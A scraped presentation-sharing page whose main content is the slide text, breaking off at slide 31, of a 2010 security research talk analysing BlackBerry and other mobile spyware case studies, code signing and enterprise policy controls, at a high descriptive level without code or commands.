Enviar búsqueda
Cargar
The Coming Wave of Smartphone Attacks - Texas DIR
•
1 recomendación
•
498 vistas
Tyler Shields
Seguir
Tecnología
Denunciar
Compartir
Denunciar
Compartir
1 de 58
Recomendados
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Tyler Shields
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Tyler Shields
BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the Berries
Tyler Shields
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Tyler Shields
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Tyler Shields
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The Berries
Tyler Shields
Neli Vacheva - IDC
Neli Vacheva - IDC
Ivo_Dreshkov
Mobile Services in Japan
Mobile Services in Japan
MobileMonday Norway
Recomendados
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Source Boston 2010 - The Monkey Steals the Berries Part Deux
Tyler Shields
Software Developers Forum 2010 - The Monkey Steals the Berries
Software Developers Forum 2010 - The Monkey Steals the Berries
Tyler Shields
BRUCon 2010 - The Monkey Steals the Berries
BRUCon 2010 - The Monkey Steals the Berries
Tyler Shields
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
iSec Forum NYC - Smartphone Backdoors an Analysis of Mobile Spyware
Tyler Shields
Raleigh ISSA 2010 - The Monkey Steals the Berries
Raleigh ISSA 2010 - The Monkey Steals the Berries
Tyler Shields
GovCert.NL - The Monkey Steals The Berries
GovCert.NL - The Monkey Steals The Berries
Tyler Shields
Neli Vacheva - IDC
Neli Vacheva - IDC
Ivo_Dreshkov
Mobile Services in Japan
Mobile Services in Japan
MobileMonday Norway
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
AdMob Inc
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
Ross Sleight
Mobile Vas
Mobile Vas
ajaytripti
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Julie Hansen
Mobile2012 L2 Think Tank
Mobile2012 L2 Think Tank
Henri Kaufman
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
bianchiassociates
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
HUNGRY BOYS Creative agency
The rules of mobile advertising
The rules of mobile advertising
Seungyul Kim
India on internet 2012
India on internet 2012
Arnab Mitra
China Mvas Changing Environment 2007
China Mvas Changing Environment 2007
Bruno Bensaid
Facebook: an investment for the future
Facebook: an investment for the future
Ideas4Tomorrow
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
James Cameron
The Insider Track to Mobile Marketing
The Insider Track to Mobile Marketing
InMobi
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Agency of Industrial Marketing
Palace North Entry
Palace North Entry
guest5a0f8c6
Kti mariani
Kti mariani
Operator Warnet Vast Raha
Trabajo%20incendios.odt 1
Trabajo%20incendios.odt 1
alba3838
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
Luciana Tamas
Lynch Total Waste Solutions 2016
Lynch Total Waste Solutions 2016
Jason Cracknell M.Sc., MCIWM, DGSA
Queridos monstruos2
Queridos monstruos2
Paola Aránguiz
Tech M&A Monthly: Sellers Panel
Tech M&A Monthly: Sellers Panel
Corum Group
The Diversity Imperative: 14th Annual Australian Chief Executive Study
The Diversity Imperative: 14th Annual Australian Chief Executive Study
PwC's Strategy&
Más contenido relacionado
La actualidad más candente
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
AdMob Inc
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
Ross Sleight
Mobile Vas
Mobile Vas
ajaytripti
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Julie Hansen
Mobile2012 L2 Think Tank
Mobile2012 L2 Think Tank
Henri Kaufman
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
bianchiassociates
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
HUNGRY BOYS Creative agency
The rules of mobile advertising
The rules of mobile advertising
Seungyul Kim
India on internet 2012
India on internet 2012
Arnab Mitra
China Mvas Changing Environment 2007
China Mvas Changing Environment 2007
Bruno Bensaid
Facebook: an investment for the future
Facebook: an investment for the future
Ideas4Tomorrow
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
James Cameron
The Insider Track to Mobile Marketing
The Insider Track to Mobile Marketing
InMobi
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Agency of Industrial Marketing
La actualidad más candente
(14)
AdMob Mobile Metrics Report - March 2010
AdMob Mobile Metrics Report - March 2010
Somo - Investing in a Mobile Strategy (UK specific)
Somo - Investing in a Mobile Strategy (UK specific)
Mobile Vas
Mobile Vas
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Special BI Intelligence Presentation: Cracking The Mobile Code In Social Media
Mobile2012 L2 Think Tank
Mobile2012 L2 Think Tank
Ad Mob Mobile Metrics Feb 10
Ad Mob Mobile Metrics Feb 10
The death of the click (с) Osnat Zaretsky
The death of the click (с) Osnat Zaretsky
The rules of mobile advertising
The rules of mobile advertising
India on internet 2012
India on internet 2012
China Mvas Changing Environment 2007
China Mvas Changing Environment 2007
Facebook: an investment for the future
Facebook: an investment for the future
Tarik Fawzi, AEneas #Maduk
Tarik Fawzi, AEneas #Maduk
The Insider Track to Mobile Marketing
The Insider Track to Mobile Marketing
Мониторинг рынка плоского стекла
Мониторинг рынка плоского стекла
Destacado
Palace North Entry
Palace North Entry
guest5a0f8c6
Kti mariani
Kti mariani
Operator Warnet Vast Raha
Trabajo%20incendios.odt 1
Trabajo%20incendios.odt 1
alba3838
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
Luciana Tamas
Lynch Total Waste Solutions 2016
Lynch Total Waste Solutions 2016
Jason Cracknell M.Sc., MCIWM, DGSA
Queridos monstruos2
Queridos monstruos2
Paola Aránguiz
Tech M&A Monthly: Sellers Panel
Tech M&A Monthly: Sellers Panel
Corum Group
The Diversity Imperative: 14th Annual Australian Chief Executive Study
The Diversity Imperative: 14th Annual Australian Chief Executive Study
PwC's Strategy&
Sydney Oracle Meetup - access paths
Sydney Oracle Meetup - access paths
paulguerin
De thi-minh-hoa-de-thi-danh-gia-nang-luc-dhqghn-2016-co-loi-giai
De thi-minh-hoa-de-thi-danh-gia-nang-luc-dhqghn-2016-co-loi-giai
On thi
ระบบบริการสุขภาพภาครัฐ
ระบบบริการสุขภาพภาครัฐ
WC Triumph
EMC Academic Alliance Presentation
EMC Academic Alliance Presentation
Haitham El-Ghareeb
[Vnmath.com] bai giang-trong_tam_ve_ham_so_thay_dang_viet_hung
[Vnmath.com] bai giang-trong_tam_ve_ham_so_thay_dang_viet_hung
Đức Mạnh Ngô
Destacado
(13)
Palace North Entry
Palace North Entry
Kti mariani
Kti mariani
Trabajo%20incendios.odt 1
Trabajo%20incendios.odt 1
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
IZABELA IONESCU - EXPOZITIA DE PICTURA A LUCIANEI TAMAS S-A BUCURAT DE UN REA...
Lynch Total Waste Solutions 2016
Lynch Total Waste Solutions 2016
Queridos monstruos2
Queridos monstruos2
Tech M&A Monthly: Sellers Panel
Tech M&A Monthly: Sellers Panel
The Diversity Imperative: 14th Annual Australian Chief Executive Study
The Diversity Imperative: 14th Annual Australian Chief Executive Study
Sydney Oracle Meetup - access paths
Sydney Oracle Meetup - access paths
De thi-minh-hoa-de-thi-danh-gia-nang-luc-dhqghn-2016-co-loi-giai
De thi-minh-hoa-de-thi-danh-gia-nang-luc-dhqghn-2016-co-loi-giai
ระบบบริการสุขภาพภาครัฐ
ระบบบริการสุขภาพภาครัฐ
EMC Academic Alliance Presentation
EMC Academic Alliance Presentation
[Vnmath.com] bai giang-trong_tam_ve_ham_so_thay_dang_viet_hung
[Vnmath.com] bai giang-trong_tam_ve_ham_so_thay_dang_viet_hung
Similar a The Coming Wave of Smartphone Attacks - Texas DIR
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
AP DealFlow
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
InMobi
中国アプリ市場とその周辺
中国アプリ市場とその周辺
良太郎 小原
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010
Gemius
5 mobile trends (2009)
5 mobile trends (2009)
MobileMonday Switzerland
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
Web Managers Group
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
guestd94b193
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
Andris Soroka
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Jason Grigsby
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
Exicon
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
Stefan Rust - Exicon Leading digital portfolio management
Numbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
Vishal Gurbuxani
Android and its apps market overview
Android and its apps market overview
01Booster
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
Erol Dizdar
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
Erol Dizdar
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
Erol Dizdar
Introduction session
Introduction session
bvandennotelaer
Seventynine.mobi
Seventynine.mobi
Himanshu Mishra
Mobclix Sfmobile
Mobclix Sfmobile
Vishal Gurbuxani
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
Bernard Leong
Similar a The Coming Wave of Smartphone Attacks - Texas DIR
(20)
Comilion introduction presentation 26102012 (1)
Comilion introduction presentation 26102012 (1)
India now the largest mobile advertising market in Asia Pacific
India now the largest mobile advertising market in Asia Pacific
中国アプリ市場とその周辺
中国アプリ市場とその周辺
The future is mobile_gemiusMobile_presentation_10.2010
The future is mobile_gemiusMobile_presentation_10.2010
5 mobile trends (2009)
5 mobile trends (2009)
How mobile-ready are corporate websites?
How mobile-ready are corporate websites?
Quantacast Mobile Web trends report 2009
Quantacast Mobile Web trends report 2009
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
DSS ITSEC Conference 2012 - MobileIron MDM, MAM & Mobile Security
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Where 2.0 — Native vs Web vs Hybrid: Mobile Development Choices
Enterprise Mobility Computerworld Mar 2012
Enterprise Mobility Computerworld Mar 2012
Hk enterprise mobility computerworld mar 2012
Hk enterprise mobility computerworld mar 2012
Numbers - Analytics Driving Economy
Numbers - Analytics Driving Economy
Android and its apps market overview
Android and its apps market overview
Ad mob mobile-metrics-mar-10
Ad mob mobile-metrics-mar-10
AdMob 2010 mart istatistikleri
AdMob 2010 mart istatistikleri
Ad mob 2010 mart istatistikleri-
Ad mob 2010 mart istatistikleri-
Introduction session
Introduction session
Seventynine.mobi
Seventynine.mobi
Mobclix Sfmobile
Mobclix Sfmobile
The Chronicles of a Mobile-Web Economy
The Chronicles of a Mobile-Web Economy
Más de Tyler Shields
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Tyler Shields
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Tyler Shields
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Tyler Shields
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Tyler Shields
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Tyler Shields
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Tyler Shields
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Tyler Shields
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Tyler Shields
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Tyler Shields
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Tyler Shields
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Tyler Shields
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Tyler Shields
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Tyler Shields
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
Tyler Shields
More Apps More Problems
More Apps More Problems
Tyler Shields
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
Tyler Shields
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
Tyler Shields
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
Tyler Shields
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Tyler Shields
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Tyler Shields
Más de Tyler Shields
(20)
The New Mobile Landscape - OWASP Ireland
The New Mobile Landscape - OWASP Ireland
Defending Behind the Mobile Device
Defending Behind the Mobile Device
Avoiding the Pandora Pitfall
Avoiding the Pandora Pitfall
Social and Mobile and Cloud - OH MY!
Social and Mobile and Cloud - OH MY!
Social Media Basics: Security Loopholes with Twitter & Other Social Media
Social Media Basics: Security Loopholes with Twitter & Other Social Media
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
United Security Summit 2011 - Using the Mobile Top 10 as a Guide to Assessing...
Shmoocon 2010 - The Monkey Steals the Berries
Shmoocon 2010 - The Monkey Steals the Berries
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Survey of Rootkit Technologies and Their Impact on Digital Forensics
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Source Boston 2009 - Anti-Debugging A Developers Viewpoint
Static Detection of Application Backdoors
Static Detection of Application Backdoors
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Blackhat Europe 2009 - Detecting Certified Pre Owned Software
Anti-Debugging - A Developers View
Anti-Debugging - A Developers View
Praetorian Veracode Webinar - Mobile Privacy
Praetorian Veracode Webinar - Mobile Privacy
Owasp Ireland - The State of Software Security
Owasp Ireland - The State of Software Security
More Apps More Problems
More Apps More Problems
Dirty Little Secret - Mobile Applications Invading Your Privacy
Dirty Little Secret - Mobile Applications Invading Your Privacy
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics - Mobile Security Threats at Every Layer
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IT Hot Topics 2010 - The Coming Wave of Smartphone Attacks
IQT 2010 - The App Does That!?
IQT 2010 - The App Does That!?
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Triangle InfoSecCon - Detecting Certified Pre-Owned Software and Devices
Último
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Angeliki Cooney
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Bhuvaneswari Subramani
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Jeffrey Haguewood
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
Christopher Logan Kennedy
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
johnbeverley2021
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
apidays
Architecting Cloud Native Applications
Architecting Cloud Native Applications
WSO2
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Rustici Software
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
WSO2
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
danishmna97
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Juan lago vázquez
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Zilliz
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
?#DUbAI#??##{{(☎️+971_581248768%)**%*]'#abortion pills for sale in dubai@
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Safe Software
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
Khushali Kathiriya
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
The Digital Insurer
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
sudhanshuwaghmare1
Último
(20)
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Elevate Developer Efficiency & build GenAI Application with Amazon Q
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Understanding the FAA Part 107 License ..
Understanding the FAA Part 107 License ..
Six Myths about Ontologies: The Basics of Formal Ontology
Six Myths about Ontologies: The Basics of Formal Ontology
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Architecting Cloud Native Applications
Architecting Cloud Native Applications
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
Platformless Horizons for Digital Adaptability
Platformless Horizons for Digital Adaptability
CNIC Information System with Pakdata Cf In Pakistan
CNIC Information System with Pakdata Cf In Pakistan
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
Polkadot JAM Slides - Token2049 - By Dr. Gavin Wood
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
FWD Group - Insurer Innovation Award 2024
FWD Group - Insurer Innovation Award 2024
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
The Coming Wave of Smartphone Attacks - Texas DIR
1.
The Coming Wave
of Smartphone Attacks An Analysis of Blackberry and Other Mobile Device Spyware Tyler Shields – Senior Researcher
2.
Outline Background Case
Studies of Mobile Spyware Blackberry Security Mechanisms Installation Methods Effects and Behaviors Technical Specifications Methods of Detection and Future Work Demonstration © 2010 Veracode, Inc. 2
3.
Presenter Background Currently
Sr. Security Researcher, Veracode, Inc. Previously Security Consultant - Symantec Security Consultant - @Stake Incident Response and Forensics Handler – US Government Wishes He Was Infinitely Rich Personal Trainer to hot Hollywood starlets © 2010 Veracode, Inc. 3
4.
Mobile Spyware Often
includes modifications to legitimate programs designed to compromise the device or device data Often inserted by those who have legitimate access to source code or distribution binaries May be intentional or inadvertent Not specific to any particular programming language Not specific to any particular mobile Operating System © 2010 Veracode, Inc. 4
5.
Attacker Motivation Practical
method of compromise for many systems – Let the users install your backdoor on systems you have no access to – Looks like legitimate software so may bypass mobile AV Retrieve and manipulate valuable private data – Looks like legitimate application traffic so little risk of detection For high value targets such as financial services and government it becomes cost effective and more reliable – High-end attackers will not be content to exploit opportunistic vulnerabilities, which might be fixed and therefore unavailable at a critical juncture. They may seek to implant vulnerability for later exploitation – Think “Aurora” for Mobile Devices © 2010 Veracode, Inc. 5
6.
Why is Mobile
The Future of Spyware © 2010 Veracode, Inc. 6
7.
Units Sold By
Operating System 90,000.00 80,879 80,000.00 72,934 70,000.00 60,000.00 Units Sold 50,000.00 40,000.00 34,347 2008 Units 2009 Units 30,000.00 24,890 23,149 20,000.00 16,498 11,418 10,622 10,000.00 15,028 6,798 1,193 4,027 8,127 641 0 1,112 0.00 Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs Motion Windows Mobile Data Source: DISTMO Appstore Analytics Operating System www.appstore.info © 2010 Veracode, Inc. 7
8.
Units Sold Market
Growth 8% 6% 6% Percentage Growth in Market Share 4% 3% 3% 2% 0% 0% Symbian Research In iPhone OS Microsoft Linux Android WebOS Other OSs 0% Motion Windows Mobile -2% -2% -3% -3% -4% -6% -6% Operating System Data Source: DISTMO Appstore Analytics www.appstore.info © 2010 Veracode, Inc. 8
9.
Application Counts
160,000 150,998 140,000 120,000 Number Of Applications In Store Last Counted Jan/Feb 2010 100,000 80,000 60,000 40,000 19,897 20,000 6118 5291 1452 944 0 iPhone App Store Android Nokia Ovi Store Blackberry App Palm App Catalog Windows Marketplace (Maemo) World Marketplace Data Source: DISTMO Appstore Analytics Marketplace Name www.appstore.info © 2010 Veracode, Inc. 9
10.
iPhone Applications Sold
3.00 Applications Sold (In Billions) 2.50 2.00 1.50 1.00 0.50 0.00 Data Source: Gartner, Inc., a research and advisory firm © 2010 Veracode, Inc. 10
11.
Back To The
Future © 2010 Veracode, Inc. 11
12.
Back To The
Future © 2010 Veracode, Inc. 12
13.
Case Studies of
Mobile Spyware © 2010 Veracode, Inc. 13
14.
FlexiSpy http://www.flexispy.com $149
- $350 PER YEAR depending on features Features – Remote Listening – C&C Over SMS – SMS and Email Logging – Call History Logging – Location Tracking – Call Interception – GPS Tracking – Symbian, Blackberry, Windows Mobile Supported © 2010 Veracode, Inc. 14
15.
FlexiSpy Web Site
Quotes “Download FlexiSPY spyphone software directly onto a mobile phone and receive copies of SMS, Call Logs, Emails, Locations and listen to conversations within minutes of purchase. “ “Catch cheating wives or cheating husbands, stop employee espionage, protect children, make automatic backups, bug meetings rooms etc.” “F Secure seem to think that its ok for them to interfere with legitimate, legal and accountable software. Who appointed them judge, jury and executioner anyway, and why wont they answer our emails, so we have to ask who is the real malware? Here is how to remove FSecure malware from your device. Please don't believe the fsecure fear mongers who simply wish you to buy their products.” © 2010 Veracode, Inc. 15
16.
Mobile Spy http://www.mobile-spy.com
$49.97 PER QUARTER or $99.97 PER YEAR Features – SMS Logging – Call Logging – GPS Logging – Web URL Logging – BlackBerry, iPhone (Jailbroken Only), Android, Windows Mobile or Symbian © 2010 Veracode, Inc. 16
17.
Mobile Spy Web
Site Quotes “This high-tech spy software will allow you to see exactly what they do while you are away. Are your kids texting while driving or using the phone in all hours of the night? Are your employees sending company secrets? Do they erase their phone logs?” “Our software is not for use on a phone you do not own or have proper permission to monitor from the user or owner. You must always follow all applicable laws and regulations in your region.” “Purchased by more than 30,000 customers in over 150 countries” © 2010 Veracode, Inc. 17
18.
Etisalat (SS8) Cell
carrier in United Arab Emirates (UAE) Pushed via SMS as “software patch” for Blackberry smartphones Upgrade urged to “enhance performance” of Blackberry service Blackberry PIN messaging as C&C Sets FLAG_HIDDEN bit to true Interception of outbound email / SMS only Discovered due to flooded listener server cause retries that drained batteries of affected devices Accidentally released the .jar as well as the .cod (ooopsie?!) © 2010 Veracode, Inc. 18
19.
Bugs & Phonesnoop
Bugs – Exfiltration of inbound and outbound email – Hidden PhoneSnoop – Remotely turn on a Blackberry phone microphone – Listen in on target ambient conversation © 2010 Veracode, Inc. 19
20.
Storm8 Phone Number
Farming – iMobsters and Vampires Live (and others) – “Storm8 has written the software for all its games in such a way that it automatically accesses, collects, and transmits the wireless telephone number of each iPhone user who downloads any Storm8 game," the suit alleges. " ... Storm8, though, has no reason whatsoever to access the wireless phone numbers of the iPhones on which its games are installed." – “Storm8 says that this code was used in development tests, only inadvertently remained in production builds, and removed as soon as it was alerted to the issue.” – These were available via the iTunes App Store! – http://www.boingboing.net/2009/11/05/iphone-game-dev-accu.html © 2010 Veracode, Inc. 20
21.
Symbian Sexy Space
– Poses as legitimate server ACSServer.exe – Calls itself 'Sexy Space„ – Steals phone and network information – Exfiltrates data via hacker owned web site connection – Can SPAM contact list members – Basically a “botnet” for mobile phones – Signing process Anti-virus scan using F-Secure - Approx 43% proactive detection rate (PCWorld) Random selection of inbound manually assessed – Symbian signed this binary as safe! – http://news.zdnet.co.uk/security/0,1000000189,39684313,00.htm © 2010 Veracode, Inc. 21
22.
Symbian MergoSMS
– The worm spreads as self-signed (untrusted) SIS installers – Installer contains sub-SIS installers some of them signed by Symbian. – Spreads by sending text messages Contain variable messages in Chinese and a link to a website Going to link results in worm download – On phone reboot malware runs, downloads worm payload, completing infection – The worm was spread on Chinese file sharing web sites – Originally spread as games, themes, etc. for Symbian Series60 3rd & 5th edition phones. – http://www.f-secure.com/v-descs/trojan_symbos_merogosms.shtml © 2010 Veracode, Inc. 22
23.
09Droid – Banking
Applications Attack – Droid app that masquerades as any number of different target banking applications – Target banks included Royal Bank of Canada Chase BB&T SunTrust Over 50 total financial institutions were affected – May steal and exfiltrate banking credentials – Approved and downloaded from Google’s Android Marketplace! – http://www.theinquirer.net/inquirer/news/1585716/fraud-hits-android-apps- market – http://www.pcadvisor.co.uk/news/index.cfm?RSS&NewsID=3209953 – http://www.f-secure.com/weblog/archives/00001852.html © 2010 Veracode, Inc. 23
24.
Blackberry Security Mechanisms ©
2010 Veracode, Inc. 24
25.
Blackberry Takes Security
Seriously KB05499: Protecting the BlackBerry smartphone and BlackBerry Enterprise Server against malware http://www.blackberry.com/btsc/search.do?cmd=displayKC&docTyp e=kc&externalId=KB05499 Protecting the BlackBerry device platform against malware http://docs.blackberry.com/en/admin/deliverables/1835/Protecting the BlackBerry device platform against malware.pdf Placing the BlackBerry Enterprise Solution in a segmented network http://docs.blackberry.com/en/admin/deliverables/1460/Placing_the_ BlackBerry_Enterprise_Solution_in_a_Segmented_Network.pdf BlackBerry Enterprise Server Policy Reference Guide http://docs.blackberry.com/en/admin/deliverables/7228/Policy_Refer ence_Guide.pdf © 2010 Veracode, Inc. 25
26.
Does It Really
Matter?! Only 23% of smartphone owners use the security software installed on the devices. (Source: Trend Micro Inc. survey of 1,016 U.S. smartphone users, June 2009) 13% of organizations currently protect from mobile viruses (Mobile Security 2009 Survey by Goode Intelligence) © 2010 Veracode, Inc. 26
27.
Code Signing Subset
of Blackberry API considered “controlled” Use of controlled package, class, or method requires appropriate code signature Blackberry Signature Tool comes with the Blackberry JDE Acquire signing keys by filling out a web form and paying $20 – This not is a high barrier to entry – 48 hours later you receive signing keys Install keys into signature tool © 2010 Veracode, Inc. 27
28.
Code Signing Process
Hash of code sent to RIM for API tracking purposes only RIM does not get source code COD file is signed based on required keys Application ready to be deployed Easy to acquire anonymous keys © 2010 Veracode, Inc. 28
29.
IT Policies Requires
connection to Blackberry Enterprise Server (BES) Supersedes lower levels of security restrictions Prevent devices from downloading third-party applications over wireless Prevent installation of specific third-party applications Control permissions of third party applications – Allow Internal Connections – Allow Third-Party Apps to Use Serial Port – Allow External Connections MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 29
30.
Application Policies Can
be controlled at the BES If no BES present, controls are set on the handheld itself Can only be MORE restrictive than the IT policy, never less Control individual resource access per application Control individual connection access per application MOSTLY “Default Allow All” policy for BES and non-BES devices © 2010 Veracode, Inc. 30
31.
V4.7.0.148 Default 3rd
